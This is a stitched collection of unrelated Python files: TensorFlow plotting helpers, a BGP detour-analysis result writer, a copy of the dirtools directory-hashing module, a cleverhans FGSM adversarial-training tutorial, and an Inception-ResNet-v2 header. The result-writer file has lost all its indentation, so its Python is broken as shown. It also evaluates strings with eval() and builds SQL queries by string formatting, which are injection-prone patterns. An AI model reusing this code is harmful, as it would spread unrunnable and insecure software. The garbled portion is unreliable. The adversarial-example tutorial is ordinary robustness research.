    ys: y values for matplotlib.pyplot.plot.
    setter: A callable taking (fig, axes). Useful to fine-control layout of the
      figure, xlabel, xticks, etc.
    **kwargs: Extra args for matplotlib.pyplot.plot.

  Returns:
    A `tf.Summary` proto containing the line plot.
  """
  figure = plt.Figure(figsize=figsize, dpi=100, facecolor='white')
  axes = figure.add_subplot(1, 1, 1)
  # '.-' draws both markers and the connecting line.
  axes.plot(xs, ys, '.-', **kwargs)
  if setter:
    setter(figure, axes)
  return FigureToSummary(name, figure)
def AddMultiCurveSubplot(fig,
                         tensors,
                         paddings,
                         labels,
                         xlabels=None,
                         **kwargs):
  """Adds a multi curve subplot to Matplotlib figure.

  Plots one line for each entry in tensors and assigns a plot label legend.

  Args:
    fig: The Matplotlib figure (a MatplotlibFigureSummary helper -- it must
      provide AddSubplot).
    tensors: List of tensors of shape [batch, length]
    paddings: Paddings for 'tensors' with shape [batch, length] with 0. in valid
      positions and 1. in invalid.
    labels: A list of tensor names (strings) of the same length as 'tensors'.
    xlabels: A string tensor of shape [batch] with an xlabel per batch.
    **kwargs: With optional, title, xlabel, ylabel, fontsize.
  """
  data = []
  row_labels = []
  # None entries are dropped along with their labels.
  for t, l in zip(tensors, labels):
    if t is not None:
      # NOTE(review): ApplyPadding presumably zeroes padded positions so
      # they don't show in the plot -- confirm against py_utils.
      data.append(py_utils.ApplyPadding(paddings, t))
      row_labels.append(l)
  shape = py_utils.GetShape(data[0], 2)
  # Stack the curves into a single [batch, num_curves, length] tensor so
  # py_func receives one tensor per subplot argument.
  data = tf.reshape(tf.concat(data, -1), [shape[0], len(data), shape[1]])
  args = [data, py_utils.LengthsFromPaddings(paddings)]
  if xlabels is not None:
    args.append(xlabels)
  fig.AddSubplot(
      args, plot_func=_AddMultiCurveRowPlots, row_labels=row_labels, **kwargs)
def _AddMultiCurveRowPlots(fig,
                           axes,
                           data,
                           length,
                           x_label_override=None,
                           row_labels=None,
                           title=u'',
                           xlabel=u'',
                           ylabel=u'',
                           fontsize='small'):
  """Plots each row of `data[:, :length]` as its own labeled curve."""
  del fig
  line_styles = ['b-', 'r-', 'g-', 'm-', 'y-']
  for row_idx in range(data.shape[0]):
    label = row_labels[row_idx] if row_labels else '{}'.format(row_idx)
    # Cycle through the line styles when there are more rows than styles.
    style = line_styles[row_idx % len(line_styles)]
    axes.plot(data[row_idx, :length], style, label=label)
  axes.set_xlim([0, length])
  axes.legend()
  axes.set_title(ToUnicode(title), size=fontsize)
  if x_label_override:
    axes.set_xlabel(ToUnicode(x_label_override), size='x-small', wrap=True)
  else:
    axes.set_xlabel(ToUnicode(xlabel), size=fontsize)
  axes.set_ylabel(ToUnicode(ylabel), size=fontsize)
|
|
import threading
from contextlib import closing
import os.path
import os
import subprocess
import traceback
from customUtilities.helperFunctions import *
from customUtilities.logger import logger
class ResultWriter():
def __init__(self,resultfilename,logger=logger('detourResultWriter.log')):
    """Collects per-RIB detour results and writes them to a '|'-delimited file.

    NOTE(review): the default `logger` argument is evaluated once, when the
    class body is executed, so every instance using the default shares one
    logger object (and its log file is opened at import time) -- confirm
    this is intentional.
    """
    # RLock: write() may be called from multiple threads.
    self.lock = threading.RLock()
    self.resultfilename = resultfilename
    #There could be some old garbage result file with same name, remove it
    if os.path.exists(self.resultfilename):
        os.remove(self.resultfilename)
    self.logger=logger
    self.peers = []
    self.rib_name=None
    self.rib_time='NULL'
    self.num_entries=0
    self.num_def_detours=0
    self.num_poss_detours=0
    self.ProcessedRibData=[] #List to hold summarized information about result file
    self.ProcessedPeerData=[] #List to hold summarized information per peer
    self.ProcessedPeerInfo=[] #List to hold peer location info
def resetparams(self):
if os.path.exists(self.resultfilename):
os.remove(self.resultfilename)
self.peers = []
self.rib_name=None
self.rib_time='NULL'
self.num_entries=0
self.num_def_detours=0
self.num_poss_detours=0
def write(self,val):
self.lock.acquire()
try:
#Log file
resultfile = open(self.resultfilename,'a')
valList=eval(val)
strg=''
for field in valList:
#logger.warn(str(field))
strg=strg+str(field)+'|'
print(strg[:-1],file=resultfile)
resultfile.close()
finally:
self.lock.release()
def populateProcessedPeerData(self,processedRibsID):
self.ProcessedPeerData=[]
for iter in range(0,len(self.peers)):
flist=[]
#flist.append('None') # For ID
flist.append(processedRibsID)
flist.append(self.peers[iter].peerIP)
flist.append(self.peers[iter].peer_num_entries)
flist.append(self.peers[iter].peer_num_poss_detours)
flist.append(self.peers[iter].peer_num_def_detours)
self.ProcessedPeerData.append(flist)
def populateProcessedRibData(self,status):
self.ProcessedRibData=[]
flist=[]
flist.append('None') # For ID
flist.append(self.rib_name)
flist.append(self.rib_time)
curr_epoch,_=currentTime()
flist.append(curr_epoch)
flist.append(status)
flist.append(self.num_entries)
flist.append(self.num_poss_detours)
flist.append(self.num_def_detours)
self.ProcessedRibData.append(flist)
def populateProcessedPeerInfo(self):
self.ProcessedPeerInfo=[]
for iter in range(0,len(self.peers)):
flist=[]
flist.append('None') # For ID
flist.append(self.peers[iter].peerAS)
flist.append(self.peers[iter].peerIP)
flist.append(self.peers[iter].peerCountry)
self.ProcessedPeerInfo.append(flist)
def get_ASPath(self,db,as_path):
with closing( db.cursor() ) as cur:
try:
cur.execute("select as_path from UniqueAbnormalPaths where as_path = '{0}'".format(as_path))
retval=cur.fetchone()
except:
logger.error("Invalid Path: "+as_path)
raise Exception('Select ASPath to UniqueAbnormalPaths Failed')
return retval
def push_UniqueAbnormalPaths(self,db,data):
with closing( db.cursor() ) as cur:
try:
#TODO: Check if this path has been pushed previously
cur.executemany("insert into UniqueAbnormalPaths(id,as_path,countries,analysis,detour_origin_asn,detour_origin_countries,detour_return_asn,detour_return_countries,detour_length,detour_destination_asn,detour_destination_countries,detour_countries_affected) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)",data)
db.commit()
except:
raise Exception('Multi-Insert to UniqueAbnormalPaths Failed')
def push_AbnormalRibEntries(self,db,data):
with closing( db.cursor() ) as cur:
try:
cur.executemany("insert into AbnormalRibEntries(id,rib_time,peer,prefix,as_path) values (%s,%s,%s,%s,%s)",data)
db.commit()
except:
raise Exception('Multi-Insert to AbnormalRibEntries Failed')
def push_ProcessedRibs(self,db,data):
with closing( db.cursor() ) as cur:
try:
cur.execute("insert into ProcessedRibs(id,rib_name,rib_time,insert_time,read_status,num_entries,num_poss_detours,num_def_detours) values (%s,%s,%s,%s,%s,%s,%s,%s)",data[0])
db.commit()
cur.execute("select id from ProcessedRibs where rib_name= '{0}'".format(data[0][1]))
processedRibsID=cur.fetchone()
return processedRibsID[0]
except:
raise Exception('Multi-Insert to push_ProcessedRibs Failed')
def push_ProcessedPeers(self,db,data):
with closing( db.cursor() ) as cur:
try:
cur.executemany("insert into ProcessedPeers(processedRibsID,peerIP,peer_num_entries,peer_num_poss_detours,peer_num_def_detours) values (%s,%s,%s,%s,%s)",data)
db.commit()
except:
raise Exception('Multi-Insert to ProcessedPeers Failed')
def push_PeerInfo(self,db,data):
with closing( db.cursor() ) as cur:
try:
for datarow in data:
cur.execute("select id from PeerInfo where peerIP = '{0}'".format(datarow[2]))
retval=cur.fetchone()
if not retval:
cur.execute("insert into PeerInfo(id,peerAS,peerIP,peerIP_Country) values (%s,%s,%s,%s)",datarow)
db.commit()
except:
raise Exception('Multi-Insert to push_PeerInfo Failed')
def loadtoDB(self,db):
self.lock.acquire()
toPushUniqueAbnormalPaths=[]
toPushAbnormalRibEntries=[]
try:
#if not os.path.exists(self.resultfilename):
# logger.warn('No result file for: '+str(self.resultfilename))
# self.resetparams()
# return
self.logger.info("Pushing "+self.resultfilename+" to DB.")
seenASPaths=[]
if os.path.exists(self.resultfilename):
f=open(self.resultfilename, 'r')
for line in f:
if line == "":
continue
rl = line.strip()
#TODO: rline should be a dict
rline=rl.split('|')
if rline[6] == 'poss':
self.num_poss_detours+=1
elif rline[6] == 'def':
self.num_def_detours+=1
iter=0
for pObj in self.peers:
if pObj.peerIP == rline[2]:
#print(pObj.peerIP, rline[2])
if rline[6] == 'poss':
self.peers[iter].peer_num_poss_detours+=1
elif rline[6] == 'def':
self.peers[iter].peer_num_def_detours+=1
break
iter+=1
if rline[4] not in seenASPaths:
if self.get_ASPath(db,rline[4]) is None:
finalent=[]
finalent.append(rline[0])
finalent.append(rline[4])
seenASPaths.append(rline[4])
finalent.append(str(rline[5]))
finalent.append(rline[6])
finalent.append(rline[7])
#finalent.append("\'"+str(rline[8])+"\'")
finalent.append(str(rline[8]))
finalent.append(rline[9])
finalent.append(str(rline[10]))
finalent.append(rline[11])
finalent.append(str(rline[12]))
finalent.append(str(rline[13]))
finalent.append(str(rline[14]))
toPushUniqueAbnormalPaths.append(finalent)
if rline[6] == 'def':
fentry=[]
fentry.append(rline[0])
fentry.append(rline[1])
fentry.append(rline[2])
fentry.append(rline[3])
fentry.append(rline[4])
toPushAbnormalRibEntries.append(fentry)
f.close()
#Update ProcessedRibs table
self.populateProcessedRibData('OK')
processedRibsID=self.push_ProcessedRibs(db,self.ProcessedRibData)
#Update ProcessedPeers table
self.populateProcessedPeerData(processedRibsID)
self.push_ProcessedPeers(db,self.ProcessedPeerData)
#Update ProcessedPeers table
self.populateProcessedPeerInfo()
self.push_PeerInfo(db,self.ProcessedPeerInfo)
self.push_UniqueAbnormalPaths(db,toPushUniqueAbnormalPaths)
self.push_AbnormalRibEntries(db,toPushAbnormalRibEntries)
self.logger.info("Pushed "+self.resultfilename+" to DB.")
self.resetparams() #resultfile must be closed before this call
finally:
self.lock.release()
db.commit()
return toPushAbnormalRibEntries
def loadTracestoDB(self,db,normalizeabnormalRibEntries):
for entry in normalizeabnormalRibEntries:
try:
id=entry[0]
ribTime=entry[1]
peer=entry[2]
prefix=entry[3]
net=entry[4]
randomHost=entry[5]
asPath=entry[6]
outfileName=entry[7]
#Read the warts file
lines = subprocess.check_output(["sc_warts2json", outfileName],universal_newlines=True)
data=[]
data.append(id)
data.append(ribTime)
data.append(peer)
data.append(prefix)
data.append(net)
data.append(randomHost)
data.append(asPath)
data.append(lines)
with closing( db.cursor() ) as cur:
try:
cur.execute("insert into Traceroutes(id,rib_time,peer,prefix,net,host_ip,as_path,json_trace) values (%s,%s,%s,%s,%s,%s,%s,%s)",data)
db.commit()
except:
raise Exception('Multi-Insert to UniqueAbnormalPaths Failed')
os.remove(outfileName)
except:
traceback.print_exc()
self.logger.error('Problem in inserting data to Traceroutes table.')
db.commit()
|
|
# -*- coding: utf-8 -*-
# Source: https://github.com/tsileo/dirtools (copied here because pypi package is not updated)
import logging
import os
import hashlib
from contextlib import closing # for Python2.6 compatibility
import tarfile
import tempfile
from datetime import datetime
import json
from globster import Globster
log = logging.getLogger("dirtools")  # Module-level logger; Dir.is_excluded logs exclusion matches here.
# TODO abs=True args for .files(), .subdirs() ?
def load_patterns(exclude_file=".exclude"):
    """ Load exclusion patterns from `exclude_file' and return them as a list.

    Empty lines are dropped.  The file is closed before returning; the
    previous implementation leaked the file handle and returned a lazy
    `filter` object instead of the documented list.

    :type exclude_file: str
    :param exclude_file: File containing exclude patterns

    :rtype: list
    :return: List of patterns
    """
    with open(exclude_file) as f:
        return [pattern for pattern in f.read().split("\n") if pattern]
def _filehash(filepath, blocksize=4096):
    """ Return the sha256 hash object for the file `filepath',
    reading the file in chunks of `blocksize' bytes.

    :type filepath: str
    :param filepath: Path to file

    :type blocksize: int
    :param blocksize: Size of the chunk when processing the file

    """
    sha = hashlib.sha256()
    with open(filepath, 'rb') as fp:
        # iter() with a sentinel yields chunks until read() returns b''.
        for chunk in iter(lambda: fp.read(blocksize), b''):
            sha.update(chunk)
    return sha
def filehash(filepath, blocksize=4096):
    """ Return the sha256 hexdigest() for the file `filepath',
    processing the file by chunk of `blocksize' bytes.

    :type filepath: str
    :param filepath: Path to file

    :type blocksize: int
    :param blocksize: Size of the chunk when processing the file

    """
    digest = hashlib.sha256()
    with open(filepath, 'rb') as fp:
        while True:
            block = fp.read(blocksize)
            if not block:
                break
            digest.update(block)
    return digest.hexdigest()
class File(object):
    """Wrapper around a single file: content hashing and gzip compression."""

    def __init__(self, path):
        self.file = os.path.basename(path)   # File name only.
        self.path = os.path.abspath(path)    # Absolute location.

    def _hash(self):
        """ Return the hash object. """
        return _filehash(self.path)

    def hash(self):
        """ Return the hash hexdigest. """
        return filehash(self.path)

    def compress_to(self, archive_path=None):
        """ Compress the file with gzip using tarfile.

        :type archive_path: str
        :param archive_path: Path to the archive, if None, a tempfile is created
        """
        if archive_path is None:
            archive = tempfile.NamedTemporaryFile(delete=False)
            tar_args = ()
            tar_kwargs = {'fileobj': archive}
            _return = archive.name
        else:
            # Bug fix: `(archive_path)` was just a parenthesized string, so
            # `tarfile.open(*tar_args)` splatted the path one character per
            # argument. A one-element tuple is what was intended.
            tar_args = (archive_path,)
            tar_kwargs = {}
            _return = archive_path
        tar_kwargs.update({'mode': 'w:gz'})
        with closing(tarfile.open(*tar_args, **tar_kwargs)) as tar:
            tar.add(self.path, arcname=self.file)
        return _return
class Dir(object):
    """ Wrapper for dirtools arround a path.

    Try to load a .exclude file, ready to compute hashdir.

    :type directory: str
    :param directory: Root directory for initialization

    :type exclude_file: str
    :param exclude_file: File containing exclusion pattern,
        .exclude by default, you can also load .gitignore files.

    :type excludes: list
    :param excludes: List of additionals patterns for exclusion,
        by default: ['.git/', '.hg/', '.svn/']

    """
    def __init__(self, directory=".", exclude_file=".exclude",
                 excludes=['.git/', '.hg/', '.svn/']):
        if not os.path.isdir(directory):
            raise TypeError("Directory must be a directory.")
        self.directory = os.path.basename(directory)
        self.path = os.path.abspath(directory)
        self.parent = os.path.dirname(self.path)
        self.exclude_file = os.path.join(self.path, exclude_file)
        # Copy before extending: extending the default list in place leaked
        # this instance's patterns into every Dir constructed afterwards
        # (classic mutable-default-argument bug).
        self.patterns = list(excludes)
        if os.path.isfile(self.exclude_file):
            self.patterns.extend(load_patterns(self.exclude_file))
        self.globster = Globster(self.patterns)

    def hash(self, index_func=os.path.getmtime):
        """ Hash for the entire directory (except excluded files) recursively.

        Use mtime instead of sha256 by default for a faster hash.

        >>> dir.hash(index_func=dirtools.filehash)

        """
        shadir = hashlib.sha256()
        for f in self.files():
            try:
                # encode() fix: sha256.update() requires bytes on Python 3;
                # feeding it str raised TypeError and broke hash() entirely.
                shadir.update(
                    str(index_func(os.path.join(self.path, f))).encode('utf-8'))
            except (IOError, OSError):
                pass
        return shadir.hexdigest()

    def iterfiles(self, pattern=None, abspath=False):
        """ Generator for all the files not excluded recursively.

        Return relative path.

        :type pattern: str
        :param pattern: Unix style (glob like/gitignore like) pattern

        """
        if pattern is not None:
            globster = Globster([pattern])
        for root, dirs, files in self.walk():
            for f in files:
                if pattern is None or globster.match(f):
                    if abspath:
                        yield os.path.join(root, f)
                    else:
                        yield self.relpath(os.path.join(root, f))

    def files(self, pattern=None, sort_key=lambda k: k, sort_reverse=False, abspath=False):
        """ Return a sorted list containing relative path of all files (recursively).

        :type pattern: str
        :param pattern: Unix style (glob like/gitignore like) pattern

        :param sort_key: key argument for sorted

        :param sort_reverse: reverse argument for sorted

        :rtype: list
        :return: List of all relative files paths.

        """
        return sorted(self.iterfiles(pattern, abspath=abspath), key=sort_key, reverse=sort_reverse)

    def get(self, pattern, sort_key=lambda k: k, sort_reverse=False, abspath=False):
        """ Return the first file matching `pattern' (sorted), or None. """
        res = self.files(pattern, sort_key=sort_key, sort_reverse=sort_reverse, abspath=abspath)
        if res:
            return res[0]

    def itersubdirs(self, pattern=None, abspath=False):
        """ Generator for all subdirs (except excluded).

        :type pattern: str
        :param pattern: Unix style (glob like/gitignore like) pattern

        """
        if pattern is not None:
            globster = Globster([pattern])
        for root, dirs, files in self.walk():
            for d in dirs:
                if pattern is None or globster.match(d):
                    if abspath:
                        yield os.path.join(root, d)
                    else:
                        yield self.relpath(os.path.join(root, d))

    def subdirs(self, pattern=None, sort_key=lambda k: k, sort_reverse=False, abspath=False):
        """ Return a sorted list containing relative path of all subdirs (recursively).

        :type pattern: str
        :param pattern: Unix style (glob like/gitignore like) pattern

        :param sort_key: key argument for sorted

        :param sort_reverse: reverse argument for sorted

        :rtype: list
        :return: List of all relative subdir paths.

        """
        return sorted(self.itersubdirs(pattern, abspath=abspath), key=sort_key, reverse=sort_reverse)

    def size(self):
        """ Return directory size in bytes.

        :rtype: int
        :return: Total directory size in bytes.

        """
        return sum(os.path.getsize(f) for f in self.iterfiles(abspath=True))

    def is_excluded(self, path):
        """ Return True if `path' should be excluded
        given patterns in the `exclude_file'. """
        match = self.globster.match(self.relpath(path))
        if match:
            log.debug("{0} matched {1} for exclusion".format(path, match))
            return True
        return False

    def walk(self):
        """ Walk the directory like os.path
        (yields a 3-tuple (dirpath, dirnames, filenames)
        except it exclude all files/directories on the fly. """
        for root, dirs, files in os.walk(self.path, topdown=True):
            # TODO relative walk, recursive call if root excluder found???
            ndirs = []
            # First we exclude directories (pruning `dirs` in place stops
            # os.walk from descending into them); symlinked dirs are skipped.
            for d in list(dirs):
                if self.is_excluded(os.path.join(root, d)):
                    dirs.remove(d)
                elif not os.path.islink(os.path.join(root, d)):
                    ndirs.append(d)
            nfiles = []
            for fpath in (os.path.join(root, f) for f in files):
                if not self.is_excluded(fpath) and not os.path.islink(fpath):
                    nfiles.append(os.path.relpath(fpath, root))
            yield root, ndirs, nfiles

    def find_projects(self, file_identifier=".project"):
        """ Search all directory recursively for subdirs
        with `file_identifier' in it.

        :type file_identifier: str
        :param file_identifier: File identier, .project by default.

        :rtype: list
        :return: The list of subdirs with a `file_identifier' in it.

        """
        projects = []
        for d in self.subdirs():
            # NOTE(review): joins on self.directory (the basename), so this
            # only works when the cwd is the Dir's parent; it probably should
            # use self.path -- kept as-is for compatibility.
            project_file = os.path.join(self.directory, d, file_identifier)
            if os.path.isfile(project_file):
                projects.append(d)
        return projects

    def relpath(self, path):
        """ Return a relative filepath to path from Dir path. """
        return os.path.relpath(path, start=self.path)

    def compress_to(self, archive_path=None):
        """ Compress the directory with gzip using tarlib.

        :type archive_path: str
        :param archive_path: Path to the archive, if None, a tempfile is created
        """
        if archive_path is None:
            archive = tempfile.NamedTemporaryFile(delete=False)
            tar_args = []
            tar_kwargs = {'fileobj': archive}
            _return = archive.name
        else:
            tar_args = [archive_path]
            tar_kwargs = {}
            _return = archive_path
        tar_kwargs.update({'mode': 'w:gz'})
        with closing(tarfile.open(*tar_args, **tar_kwargs)) as tar:
            # NOTE(review): the `exclude` callback was removed from tarfile
            # in Python 3.9; newer versions require `filter=` instead.
            tar.add(self.path, arcname='', exclude=self.is_excluded)
        return _return
class DirState(object):
    """ Hold a directory state / snapshot meta-data for later comparison. """

    def __init__(self, _dir=None, state=None, index_cmp=os.path.getmtime):
        self._dir = _dir
        self.index_cmp = index_cmp
        # If no precomputed state is supplied, snapshot the directory now.
        self.state = state or self.compute_state()

    def compute_state(self):
        """ Generate the index. """
        data = {}
        data['directory'] = self._dir.path
        data['files'] = list(self._dir.files())
        data['subdirs'] = list(self._dir.subdirs())
        data['index'] = self.index()
        return data

    def index(self):
        """ Map each relative file path to its comparison key
        (mtime by default). Unreadable files are reported and skipped. """
        index = {}
        for f in self._dir.iterfiles():
            try:
                index[f] = self.index_cmp(os.path.join(self._dir.path, f))
            except Exception as exc:
                print(f, exc)
        return index

    def __sub__(self, other):
        """ Compute diff with operator overloading.

        >>> path = DirState(Dir('/path'))
        >>> path_copy = DirState(Dir('/path_copy'))
        >>> diff = path_copy - path
        >>> # Equals to
        >>> diff = compute_diff(path_copy.state, path.state)

        """
        if self.index_cmp != other.index_cmp:
            raise Exception('Both DirState instance must have the same index_cmp.')
        return compute_diff(self.state, other.state)

    def to_json(self, base_path='.', dt=None, fmt=None):
        """ Serialize the state to `<dirname>@<isodate>.json` under
        `base_path` and return the written path. """
        if fmt is None:
            fmt = '{0}@{1}.json'
        if dt is None:
            dt = datetime.utcnow()
        path = fmt.format(self._dir.path.strip('/').split('/')[-1],
                          dt.isoformat())
        path = os.path.join(base_path, path)
        # Bug fix: json.dumps returns str, so the file must be opened in
        # text mode -- 'wb' raised TypeError on Python 3.
        with open(path, 'w') as f:
            f.write(json.dumps(self.state))
        return path

    @classmethod
    def from_json(cls, path):
        """ Rebuild a DirState from a JSON file written by `to_json`. """
        with open(path) as f:
            return cls(state=json.loads(f.read()))
def compute_diff(dir_base, dir_cmp):
    """ Compare `dir_base' and `dir_cmp' and returns a dict with
    the following keys:

    - deleted files `deleted'
    - created files `created'
    - updated files `updated'
    - deleted directories `deleted_dirs'

    """
    base_files = set(dir_base['files'])
    cmp_files = set(dir_cmp['files'])
    # A file common to both snapshots is "updated" when its index entry
    # (mtime/hash) differs between them.
    updated = [f for f in cmp_files & base_files
               if dir_base['index'][f] != dir_cmp['index'][f]]
    return {
        'deleted': list(cmp_files - base_files),
        'created': list(base_files - cmp_files),
        'updated': updated,
        'deleted_dirs': list(set(dir_cmp['subdirs']) - set(dir_base['subdirs'])),
    }
|
|
"""
This tutorial shows how to use cleverhans.picklable_model
to create models that can be saved for evaluation later.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import flags
from cleverhans.attacks import FastGradientMethod
from cleverhans.dataset import MNIST
from cleverhans.loss import CrossEntropy
from cleverhans.serial import save
from cleverhans.utils_tf import model_eval, silence
from cleverhans.train import train
from cleverhans.utils import AccuracyReport, set_log_level
from cleverhans_tutorials.tutorial_models import make_basic_picklable_cnn
# Silence cleverhans/TensorFlow deprecation warnings before anything else.
silence()
FLAGS = flags.FLAGS
# Tutorial defaults; each may be overridden by the command-line flags
# registered in the __main__ block below.
NB_EPOCHS = 6
BATCH_SIZE = 128
LEARNING_RATE = .001
NB_FILTERS = 64
CLEAN_TRAIN = True
BACKPROP_THROUGH_ATTACK = False
def mnist_tutorial(train_start=0, train_end=60000, test_start=0,
                   test_end=10000, nb_epochs=NB_EPOCHS, batch_size=BATCH_SIZE,
                   learning_rate=LEARNING_RATE,
                   clean_train=CLEAN_TRAIN,
                   testing=False,
                   backprop_through_attack=BACKPROP_THROUGH_ATTACK,
                   nb_filters=NB_FILTERS, num_threads=None,
                   label_smoothing=0.1):
  """
  MNIST cleverhans tutorial
  :param train_start: index of first training set example
  :param train_end: index of last training set example
  :param test_start: index of first test set example
  :param test_end: index of last test set example
  :param nb_epochs: number of epochs to train model
  :param batch_size: size of training batches
  :param learning_rate: learning rate for training
  :param clean_train: perform normal training on clean examples only
                      before performing adversarial training.
  :param testing: if true, complete an AccuracyReport for unit tests
                  to verify that performance is adequate
  :param backprop_through_attack: If True, backprop through adversarial
                                  example construction process during
                                  adversarial training.
  :param label_smoothing: float, amount of label smoothing for cross entropy
  :return: an AccuracyReport object
  """
  # Object used to keep track of (and return) key accuracies
  report = AccuracyReport()
  # Set TF random seed to improve reproducibility
  tf.set_random_seed(1234)
  # Set logging level to see debug information
  set_log_level(logging.DEBUG)
  # Create TF session
  # NOTE(review): num_threads is only used as a boolean here -- any truthy
  # value pins intra-op parallelism to 1 thread, not to num_threads.
  # Confirm whether this is intended.
  if num_threads:
    config_args = dict(intra_op_parallelism_threads=1)
  else:
    config_args = {}
  sess = tf.Session(config=tf.ConfigProto(**config_args))
  # Get MNIST test data
  mnist = MNIST(train_start=train_start, train_end=train_end,
                test_start=test_start, test_end=test_end)
  x_train, y_train = mnist.get_set('train')
  x_test, y_test = mnist.get_set('test')
  # Use Image Parameters
  img_rows, img_cols, nchannels = x_train.shape[1:4]
  nb_classes = y_train.shape[1]
  # Define input TF placeholder
  x = tf.placeholder(tf.float32, shape=(None, img_rows, img_cols,
                                        nchannels))
  y = tf.placeholder(tf.float32, shape=(None, nb_classes))
  # Train an MNIST model
  train_params = {
      'nb_epochs': nb_epochs,
      'batch_size': batch_size,
      'learning_rate': learning_rate
  }
  eval_params = {'batch_size': batch_size}
  fgsm_params = {
      'eps': 0.3,
      'clip_min': 0.,
      'clip_max': 1.
  }
  # Fixed seed so training runs are reproducible.
  rng = np.random.RandomState([2017, 8, 30])
  def do_eval(preds, x_set, y_set, report_key, is_adv=None):
    """Evaluate `preds` on (x_set, y_set), record the accuracy on `report`
    under `report_key`, and print it when `is_adv` labels the example set."""
    acc = model_eval(sess, x, y, preds, x_set, y_set, args=eval_params)
    setattr(report, report_key, acc)
    if is_adv is None:
      report_text = None
    elif is_adv:
      report_text = 'adversarial'
    else:
      report_text = 'legitimate'
    if report_text:
      print('Test accuracy on %s examples: %0.4f' % (report_text, acc))
  if clean_train:
    model = make_basic_picklable_cnn()
    # Tag the model so that when it is saved to disk, future scripts will
    # be able to tell what data it was trained on
    model.dataset_factory = mnist.get_factory()
    preds = model.get_logits(x)
    assert len(model.get_params()) > 0
    loss = CrossEntropy(model, smoothing=label_smoothing)
    def evaluate():
      do_eval(preds, x_test, y_test, 'clean_train_clean_eval', False)
    train(sess, loss, x_train, y_train, evaluate=evaluate,
          args=train_params, rng=rng, var_list=model.get_params())
    with sess.as_default():
      save("clean_model.joblib", model)
      print("Now that the model has been saved, you can evaluate it in a"
            " separate process using `evaluate_pickled_model.py`. "
            "You should get exactly the same result for both clean and "
            "adversarial accuracy as you get within this program.")
    # Calculate training error
    if testing:
      do_eval(preds, x_train, y_train, 'train_clean_train_clean_eval')
    # Initialize the Fast Gradient Sign Method (FGSM) attack object and
    # graph
    fgsm = FastGradientMethod(model, sess=sess)
    adv_x = fgsm.generate(x, **fgsm_params)
    preds_adv = model.get_logits(adv_x)
    # Evaluate the accuracy of the MNIST model on adversarial examples
    do_eval(preds_adv, x_test, y_test, 'clean_train_adv_eval', True)
    # Calculate training error
    if testing:
      do_eval(preds_adv, x_train, y_train, 'train_clean_train_adv_eval')
    print('Repeating the process, using adversarial training')
  # Create a new model and train it to be robust to FastGradientMethod
  model2 = make_basic_picklable_cnn()
  # Tag the model so that when it is saved to disk, future scripts will
  # be able to tell what data it was trained on
  model2.dataset_factory = mnist.get_factory()
  fgsm2 = FastGradientMethod(model2, sess=sess)
  def attack(x):
    """Generate FGSM adversarial examples for `x` against model2."""
    return fgsm2.generate(x, **fgsm_params)
  loss2 = CrossEntropy(model2, smoothing=label_smoothing, attack=attack)
  preds2 = model2.get_logits(x)
  adv_x2 = attack(x)
  if not backprop_through_attack:
    # For the fgsm attack used in this tutorial, the attack has zero
    # gradient so enabling this flag does not change the gradient.
    # For some other attacks, enabling this flag increases the cost of
    # training, but gives the defender the ability to anticipate how
    # the atacker will change their strategy in response to updates to
    # the defender's parameters.
    adv_x2 = tf.stop_gradient(adv_x2)
  preds2_adv = model2.get_logits(adv_x2)
  def evaluate2():
    # Accuracy of adversarially trained model on legitimate test inputs
    do_eval(preds2, x_test, y_test, 'adv_train_clean_eval', False)
    # Accuracy of the adversarially trained model on adversarial examples
    do_eval(preds2_adv, x_test, y_test, 'adv_train_adv_eval', True)
  # Perform and evaluate adversarial training
  train(sess, loss2, x_train, y_train, evaluate=evaluate2,
        args=train_params, rng=rng, var_list=model2.get_params())
  with sess.as_default():
    save("adv_model.joblib", model2)
    print("Now that the model has been saved, you can evaluate it in a "
          "separate process using "
          "`python evaluate_pickled_model.py adv_model.joblib`. "
          "You should get exactly the same result for both clean and "
          "adversarial accuracy as you get within this program."
          " You can also move beyond the tutorials directory and run the "
          " real `compute_accuracy.py` script (make sure cleverhans/scripts "
          "is in your PATH) to see that this FGSM-trained "
          "model is actually not very robust---it's just a model that trains "
          " quickly so the tutorial does not take a long time")
  # Calculate training errors
  if testing:
    do_eval(preds2, x_train, y_train, 'train_adv_train_clean_eval')
    do_eval(preds2_adv, x_train, y_train, 'train_adv_train_adv_eval')
  return report
def main(argv=None):
  """Entry point: verify the tutorial environment, then run the tutorial
  with the hyperparameters supplied on the command line."""
  from cleverhans_tutorials import check_installation
  check_installation(__file__)
  tutorial_kwargs = dict(nb_epochs=FLAGS.nb_epochs,
                         batch_size=FLAGS.batch_size,
                         learning_rate=FLAGS.learning_rate,
                         clean_train=FLAGS.clean_train,
                         backprop_through_attack=FLAGS.backprop_through_attack,
                         nb_filters=FLAGS.nb_filters)
  mnist_tutorial(**tutorial_kwargs)
if __name__ == '__main__':
  # Register the tutorial's command-line flags, then hand control to
  # tf.app.run(), which parses the flags and invokes main().
  flags.DEFINE_integer('nb_filters', NB_FILTERS, 'Model size multiplier')
  flags.DEFINE_integer('nb_epochs', NB_EPOCHS,
                       'Number of epochs to train model')
  flags.DEFINE_integer('batch_size', BATCH_SIZE, 'Size of training batches')
  flags.DEFINE_float('learning_rate', LEARNING_RATE,
                     'Learning rate for training')
  flags.DEFINE_bool('clean_train', CLEAN_TRAIN, 'Train on clean examples')
  flags.DEFINE_bool('backprop_through_attack', BACKPROP_THROUGH_ATTACK,
                    ('If True, backprop through adversarial example '
                     'construction process during adversarial training'))
  tf.app.run()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains the definition of the Inception Resnet V2 architecture.
As described in http://arxiv.org/abs/1602.07261.
Inception-v4, Inception-ResNet and the Impact of Residual Connections
on Learning
Christian Szegedy, Sergey Ioffe, Vincent Vanhoucke, Alex Alemi
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
# Inception-Renset-A
